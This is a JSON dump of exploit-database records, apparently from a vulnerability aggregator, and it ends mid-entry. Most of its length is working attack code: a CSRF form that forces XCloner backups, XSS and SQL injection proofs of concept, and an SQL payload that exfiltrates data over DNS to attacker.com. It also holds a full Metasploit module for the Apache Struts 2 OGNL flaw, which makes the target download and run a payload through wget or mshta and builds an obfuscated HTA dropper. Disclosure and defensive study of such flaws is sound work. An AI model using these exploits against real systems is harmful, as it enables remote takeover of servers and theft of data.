Lab ( https://www.htbridge.com/advisory/ )\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nAdvisory Details:\r\n \r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in XCloner Wordpress plugin, which can be exploited to perform a CSRF attack and gain access to a backed-up copy of vulnerable website.\r\n \r\n \r\n\u0421ross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin: CVE-2014-2340\r\n \r\nThe vulnerability exists due to insufficient verification of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a website backup.\r\n \r\nSimple exploit code below will create new backup with all website files (no SQL database), which will be publicly accessible on the http://[host]/administrator/backups/backup.tar URL:\r\n \r\n \r\n<form action=\"http://[host]/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=confirm\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"dbbackup\" value=\"1\">\r\n<input type=\"hidden\" name=\"dbbackup_comp\" value=\"\">\r\n<input type=\"hidden\" name=\"bname\" value=\"backup\">\r\n<input type=\"hidden\" name=\"backupComments\" value=\"\">\r\n<input type=\"hidden\" name=\"option\" value=\"com_cloner\">\r\n<input type=\"hidden\" name=\"task\" value=\"generate\">\r\n<input type=\"hidden\" name=\"boxchecked\" value=\"0\">\r\n<input type=\"hidden\" name=\"hidemainmenu\" value=\"0\">\r\n<input type=\"hidden\" name=\"\" value=\"\">\r\n<input type=\"submit\" name=\"run\" value=\"run\">\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n \r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nSolution:\r\n \r\nUpdate to XCloner 3.1.1\r\n \r\nMore Information:\r\nhttp://www.xcloner.com/support/download/?did=9\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nReferences:\r\n \r\n[1] High-Tech Bridge Advisory HTB23206 - https://www.htbridge.com/advisory/HTB23206 - \u0421ross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin.\r\n[2] XCloner Wordpress plugin - http://www.xcloner.com - XCloner is a professional website Backup and Restore application designed to allow you to create safe complete backups of any PHP/Mysql website and to be able to restore them anywhere. It works as a native Joomla backup component, as a native Wordpress backup plugin and also as standalone PHP/Mysql backup application.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22100"}, {"lastseen": "2018-01-01T23:02:14", "bulletinFamily": "exploit", "description": "Open Classifieds version 2-2.1.2 suffers from a cross site scripting vulnerability.", "modified": "2014-03-13T00:00:00", "published": "2014-03-13T00:00:00", "id": "1337DAY-ID-22022", "href": "https://0day.today/exploit/description/22022", "type": "zdt", "title": "Open Classifieds 2-2.1.2 Cross Site Scripting Vulnerability", "sourceData": "Product: Open Classifieds\r\nVendor: Open Classifieds Team\r\nVulnerable Version(s): 2-2.1.2 and probably prior\r\nTested Version: 2-2.1.2\r\nAdvisory Publication: February 19, 2014 [without technical details]\r\nVendor Notification: February 19, 2014 \r\nVendor Patch: February 20, 2014 \r\nPublic Disclosure: March 12, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-2024\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Open Classifieds, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Cross-Site Scripting (XSS) in Open Classifieds: CVE-2014-2024\r\n\r\nThe vulnerability exists due to insufficient sanitisation of user-supplied data passed via the URI to \"/shared-apartments-rooms/\" URL. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the JavaScript \"alert()\" function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/shared-apartments-rooms/</title><script>alert(%22immuniweb%22)</script>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Open Classifieds 2-2.1.3\r\n\r\nMore Information:\r\nhttps://github.com/open-classifieds/openclassifieds2/issues/556\r\nhttps://github.com/open-classifieds/openclassifieds2/commit/45ee8fb601a91b8a4238229580a32a4fd8d96ef9\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22022"}, {"lastseen": "2018-04-09T03:37:54", "bulletinFamily": "exploit", "description": "AdRotate version 3.9.4 suffers from a remote SQL injection vulnerability.", "modified": "2014-02-21T00:00:00", "published": "2014-02-21T00:00:00", "id": "1337DAY-ID-21932", "href": "https://0day.today/exploit/description/21932", "type": "zdt", "title": "AdRotate 3.9.4 SQL Injection Vulnerability", "sourceData": "Vendor: AJdG Solutions\r\nVulnerable Version(s): 3.9.4 and probably prior\r\nTested Version: 3.9.4\r\nAdvisory Publication: January 30, 2014 [without technical details]\r\nVendor Notification: January 30, 2014 \r\nVendor Patch: January 31, 2014 \r\nPublic Disclosure: February 20, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-1854\r\nRisk Level: High \r\nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in AdRotate, which can be exploited to perform SQL Injection attacks.\r\n\r\n\r\n1) SQL Injection in AdRotate: CVE-2014-1854\r\n\r\nThe vulnerability exists due to insufficient validation of \"track\" HTTP GET parameter passed to\r\n \"/wp-content/plugins/adrotate/library/clicktracker.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe following PoC code contains a base64-encoded string \"-1 UNION SELECT version(),1,1,1\", which will be injected into SQL query and will output MySQL server version:\r\n\r\nhttp://[host]/wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ==\r\n\r\nSuccessful exploitation will result in redirection to local URI that contains version of the MySQL server:\r\nhttp://[host]/wp-content/plugins/adrotate/library/5.1.71-community-log\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to AdRotate 3.9.5\r\n\r\nMore Information:\r\nhttp://www.adrotateplugin.com/2014/01/adrotate-pro-3-9-6-and-adrotate-free-3-9-5/\r\nhttp://wordpress.org/plugins/adrotate/changelog/\r\nhttp://www.adrotateplugin.com/development/\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21932"}, {"lastseen": "2018-04-13T03:42:50", "bulletinFamily": "exploit", "description": "The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with \"action:\" or \"redirect:\", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms. In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or \"redirectAction:\" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code. This Metasploit module has been tested successfully on Struts 2.3.15 over Tomcat 7, with Windows 2003 SP2 and Ubuntu 10.04 operating systems.", "modified": "2013-07-26T00:00:00", "published": "2013-07-26T00:00:00", "id": "1337DAY-ID-21032", "href": "https://0day.today/exploit/description/21032", "type": "zdt", "title": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution',\r\n 'Description' => %q{\r\n The Struts 2 DefaultActionMapper supports a method for short-circuit navigation\r\n state changes by prefixing parameters with \"action:\" or \"redirect:\", followed by\r\n a desired navigational target expression. This mechanism was intended to help with\r\n attaching navigational information to buttons within forms.\r\n\r\n In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or\r\n \"redirectAction:\" is not properly sanitized. Since said information will be\r\n evaluated as OGNL expression against the value stack, this introduces the\r\n possibility to inject server side code.\r\n\r\n This module has been tested successfully on Struts 2.3.15 over Tomcat 7, with\r\n Windows 2003 SP2 and Ubuntu 10.04 operating systems.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Takeshi Terada', # Vulnerability discovery\r\n 'sinn3r', # Metasploit module\r\n 'juan vazquez' # Metasploit modules\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-2251' ],\r\n [ 'OSVDB', '95405' ],\r\n [ 'BID', '61189' ],\r\n [ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ]\r\n ],\r\n 'Platform' => [ 'win', 'linux'],\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}],\r\n ['Windows',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n ['Linux',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'WfsDelay' => 10\r\n },\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'DisclosureDate' => 'Jul 2 2013',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [true, 'Action URI', '/struts2-blank/example/HelloWorld.action']),\r\n OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 60]),\r\n # It isn't OptPath becuase it's a *remote* path\r\n OptString.new(\"WritableDir\", [ true, \"A directory where we can write files (only on Linux targets)\", \"/tmp\" ])\r\n ], self.class)\r\n end\r\n\r\n def on_new_session(session)\r\n if session.type == \"meterpreter\"\r\n session.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\")\r\n end\r\n\r\n @dropped_files.delete_if do |file|\r\n false unless file =~ /\\.exe/\r\n win_file = file.gsub(\"/\", \"\\\\\\\\\")\r\n if session.type == \"meterpreter\"\r\n begin\r\n wintemp = session.fs.file.expand_path(\"%TEMP%\")\r\n win_file = \"#{wintemp}\\\\#{win_file}\"\r\n session.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|)\r\n session.fs.file.rm(win_file)\r\n print_good(\"Deleted #{file}\")\r\n true\r\n rescue ::Rex::Post::Meterpreter::RequestError\r\n print_error(\"Failed to delete #{win_file}\")\r\n false\r\n end\r\n end\r\n end\r\n\r\n super\r\n end\r\n\r\n def start_http_service\r\n #do not use SSL\r\n if datastore['SSL']\r\n ssl_restore = true\r\n datastore['SSL'] = false\r\n end\r\n\r\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\r\n srv_host = Rex::Socket.source_address(rhost)\r\n else\r\n srv_host = datastore['SRVHOST']\r\n end\r\n\r\n service_url = srv_host + ':' + datastore['SRVPORT'].to_s\r\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{service_url} ...\")\r\n start_service({\r\n 'Uri' => {\r\n 'Proc' => Proc.new { |cli, req|\r\n on_request_uri(cli, req)\r\n },\r\n 'Path' => '/'\r\n }\r\n })\r\n\r\n datastore['SSL'] = true if ssl_restore\r\n\r\n return service_url\r\n end\r\n\r\n def check\r\n uri = normalize_uri(target_uri.path)\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'GET'\r\n })\r\n\r\n if res.nil? or res.code != 200\r\n print_error(\"#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n proof = rand_text_alpha(6 + rand(4))\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"#{uri}?redirect:%25{new%20java.lang.String('#{proof}')}\",\r\n 'method' => 'GET'\r\n })\r\n\r\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n def auto_target\r\n uri = normalize_uri(target_uri.path)\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'GET'\r\n })\r\n\r\n if res.nil? or res.code != 200\r\n fail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - In order to autodetect, a valid action, returning 200, must be provided as TARGETURI, returning 200\")\r\n end\r\n\r\n proof = rand_text_alpha(6 + rand(4))\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"#{uri}?redirect:%25{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}\",\r\n 'method' => 'GET'\r\n })\r\n\r\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/\r\n if res.headers['Location'] =~ /:\\\\/\r\n return targets[1] # Windows\r\n else\r\n return targets[2] # Linux\r\n end\r\n end\r\n\r\n fail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - Target auto-detection didn't work\")\r\n\r\n end\r\n\r\n def exploit_linux\r\n\r\n downfile = rand_text_alpha(8+rand(8))\r\n @pl = @exe\r\n @pl_sent = false\r\n\r\n #\r\n # start HTTP service if necessary\r\n #\r\n service_url = start_http_service\r\n\r\n #\r\n # download payload\r\n #\r\n fname = datastore['WritableDir']\r\n fname = \"#{fname}/\" unless fname =~ %r'/$'\r\n fname << downfile\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Downloading payload to #{fname}...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # wait for payload download\r\n #\r\n wait_payload\r\n\r\n register_file_for_cleanup(fname)\r\n\r\n #\r\n # chmod\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Make payload executable...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # execute\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f'))).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Execute payload...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n end\r\n\r\n def exploit_windows\r\n @var_exename = rand_text_alpha(4 + rand(4)) + '.exe'\r\n @pl = build_hta\r\n @pl_sent = false\r\n\r\n #\r\n # start HTTP service if necessary\r\n #\r\n service_url = start_http_service\r\n\r\n #\r\n # execute hta\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Execute payload through malicious HTA...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # wait for payload download\r\n #\r\n wait_payload\r\n\r\n register_file_for_cleanup(@var_exename)\r\n end\r\n\r\n def exploit\r\n if target.name =~ /Automatic/\r\n print_status(\"#{rhost}:#{rport} - Target autodetection...\")\r\n my_target = auto_target\r\n print_good(\"#{rhost}:#{rport} - #{my_target.name} target found!\")\r\n else\r\n my_target = target\r\n end\r\n\r\n p = exploit_regenerate_payload(my_target.platform, my_target.arch)\r\n @exe = generate_payload_exe({:code => p.encoded, :platform => my_target.platform, :arch => my_target.arch})\r\n\r\n if my_target.name =~ /Linux/\r\n if datastore['PAYLOAD'] =~ /windows/\r\n fail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Linux, but you've selected a Windows payload!\")\r\n end\r\n exploit_linux\r\n elsif my_target.name =~ /Windows/\r\n if datastore['PAYLOAD'] =~ /linux/\r\n fail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Windows, but you've selected a Linux payload!\")\r\n end\r\n exploit_windows\r\n end\r\n end\r\n\r\n # Handle incoming requests from the server\r\n def on_request_uri(cli, request)\r\n vprint_status(\"#{rhost}:#{rport} - URI requested: #{request.inspect}\")\r\n if (not @pl)\r\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\r\n return\r\n end\r\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\r\n @pl_sent = true\r\n send_response(cli, @pl)\r\n end\r\n\r\n # wait for the data to be sent\r\n def wait_payload\r\n print_status(\"#{rhost}:#{rport} - Waiting for the victim to request the payload...\")\r\n\r\n waited = 0\r\n while (not @pl_sent)\r\n select(nil, nil, nil, 1)\r\n waited += 1\r\n if (waited > datastore['HTTP_DELAY'])\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?\")\r\n end\r\n end\r\n end\r\n\r\n def build_hta\r\n var_shellobj = rand_text_alpha(rand(5)+5);\r\n var_fsobj = rand_text_alpha(rand(5)+5);\r\n var_fsobj_file = rand_text_alpha(rand(5)+5);\r\n var_vbsname = rand_text_alpha(rand(5)+5);\r\n var_writedir = rand_text_alpha(rand(5)+5);\r\n\r\n var_origLoc = rand_text_alpha(rand(5)+5);\r\n var_byteArray = rand_text_alpha(rand(5)+5);\r\n var_writestream = rand_text_alpha(rand(5)+5);\r\n var_strmConv = rand_text_alpha(rand(5)+5);\r\n\r\n # Doing in this way to bypass the ADODB.Stream restrictions on JS,\r\n # even when executing it as an \"HTA\" application\r\n # The encoding code has been stolen from ie_unsafe_scripting.rb\r\n print_status(\"#{rhost}:#{rport} - Encoding payload into vbs/javascript/hta...\");\r\n\r\n # Build the content that will end up in the .vbs file\r\n vbs_content = Rex::Text.to_hex(%Q|\r\nDim #{var_origLoc}, s, #{var_byteArray}\r\n#{var_origLoc} = SetLocale(1033)\r\n|)\r\n # Drop the exe payload into an ansi string (ansi ensured via SetLocale above)\r\n # for conversion with ADODB.Stream\r\n vbs_ary = []\r\n # The output of this loop needs to be as small as possible since it\r\n # gets repeated for every byte of the executable, ballooning it by a\r\n # factor of about 80k (the current size of the exe template). In its\r\n # current form, it's down to about 4MB on the wire\r\n @exe.each_byte do |b|\r\n vbs_ary << Rex::Text.to_hex(\"s=s&Chr(#{(\"%d\" % b)})\\n\")\r\n end\r\n vbs_content << vbs_ary.join(\"\")\r\n\r\n # Continue with the rest of the vbs file;\r\n # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent\r\n # Then use ADODB.Stream again to write the binary to file.\r\n #print_status(\"Finishing vbs...\");\r\n vbs_content << Rex::Text.to_hex(%Q|\r\nDim #{var_strmConv}, #{var_writedir}, #{var_writestream}\r\n#{var_writedir} = WScript.CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%TEMP%\") & \"\\\\#{@var_exename}\"\r\n\r\nSet #{var_strmConv} = CreateObject(\"ADODB.Stream\")\r\n\r\n#{var_strmConv}.Type = 2\r\n#{var_strmConv}.Charset = \"x-ansi\"\r\n#{var_strmConv}.Open\r\n#{var_strmConv}.WriteText s, 0\r\n#{var_strmConv}.Position = 0\r\n#{var_strmConv}.Type = 1\r\n#{var_strmConv}.SaveToFile #{var_writedir}, 2\r\n\r\nSetLocale(#{var_origLoc})|)\r\n\r\n hta = <<-EOS\r\n <script>\r\n var #{var_shellobj} = new ActiveXObject(\"WScript.Shell\");\r\n var #{var_fsobj} = new ActiveXObject(\"Scripting.FileSystemObject\");\r\n var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings(\"%TEMP%\");\r\n var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\",2,true);\r\n\r\n #{var_fsobj_file}.Write(unescape(\"#{vbs_content}\"));\r\n #{var_fsobj_file}.Close();\r\n\r\n #{var_shellobj}.run(\"wscript.exe \" + #{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\", 1, true);\r\n #{var_shellobj}.run(#{var_writedir} + \"\\\\\\\\\" + \"#{@var_exename}\", 0, false);\r\n #{var_fsobj}.DeleteFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\");\r\n window.close();\r\n </script>\r\n EOS\r\n\r\n return hta\r\n end\r\n\r\n\r\nend\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21032"}, {"lastseen": "2018-02-10T11:18:22", "bulletinFamily": "exploit", "description": "Orbit Open Ad Server version 1.1.0 suffers from a remote SQL injection vulnerability.", "modified": "2014-04-10T00:00:00", "published": "2014-04-10T00:00:00", "id": "1337DAY-ID-22127", "href": "https://0day.today/exploit/description/22127", "type": "zdt", "title": "Orbit Open Ad Server 1.1.0 SQL Injection Vulnerability", "sourceData": "Product: Orbit Open Ad Server\r\nVendor: OrbitScripts, LLC\r\nVulnerable Version(s): 1.1.0 and probably prior\r\nTested Version: 1.1.0\r\nAdvisory Publication: March 19, 2014 [without technical details]\r\nVendor Notification: March 19, 2014 \r\nVendor Patch: March 21, 2014 \r\nPublic Disclosure: April 9, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-2540\r\nRisk Level: High \r\nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Orbit Open Ad Server, which can be exploited to perform SQL Injection attacks, alter SQL requests to database of vulnerable application and potentially gain control over the vulnerable website.\r\n\r\n1) SQL Injection in Orbit Open Ad Server: CVE-2014-2540\r\n\r\nInput passed via the \"site_directory_sort_field\" HTTP POST parameter to \"/guest/site_directory\" URL is not properly sanitised before being used in SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL commands.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n\r\n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\">\r\n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\">\r\n<input type=\"hidden\" name=\"category_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\">\r\n<input type=\"hidden\" name=\"form_mode\" value=\"save\">\r\n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\">\r\n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\">\r\n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\">\r\n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\nThe second PoC code works against any platform (UNIX/Windows) and uses blind SQL injection brute-force (dichotomy) technique to extract data from the database:\r\n\r\n\r\n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\">\r\n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\">\r\n<input type=\"hidden\" name=\"category_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\">\r\n<input type=\"hidden\" name=\"form_mode\" value=\"save\">\r\n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\">\r\n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\">\r\n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\">\r\n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(SELECT IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=0,1, BENCHMARK(22000000,MD5(NOW()))))\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Orbit Open Ad Server 1.1.1\n\n# 0day.today [2018-02-10] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22127"}], "f5": [{"lastseen": "2016-09-26T17:22:57", "bulletinFamily": "software", "description": "Recommended action\n\nNone \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL15260: Apache Struts vulnerability CVE-2014-0094\n * SOL15261: Apache Struts vulnerability CVE-2014-0112\n * SOL15262: Apache Struts vulnerability CVE-2014-0113\n", "modified": "2014-05-16T00:00:00", "published": "2014-01-20T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/14000/900/sol14933.html", "id": "SOL14933", "type": "f5", "title": "SOL14933 - Apache Struts vulnerability CVE-2013-2251", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:41:13", "bulletinFamily": "exploit", "description": "CVE-2013-2251\r\nStruts2 \u662f\u7b2c\u4e8c\u4ee3\u57fa\u4e8eModel-View-Controller (MVC)\u6a21\u578b\u7684java\u4f01\u4e1a\u7ea7web\u5e94\u7528\u6846\u67b6\u3002\u5b83\u662fWebWork\u548cStruts\u793e\u533a\u5408\u5e76\u540e\u7684\u4ea7\u7269\r\n\r\nApache 